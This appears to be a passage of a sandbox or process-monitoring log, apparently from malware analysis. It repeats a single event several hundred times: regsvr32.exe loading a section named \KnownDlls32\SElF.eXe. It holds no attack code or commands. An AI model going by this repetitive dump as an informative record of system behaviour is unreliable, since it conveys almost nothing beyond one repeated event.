Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
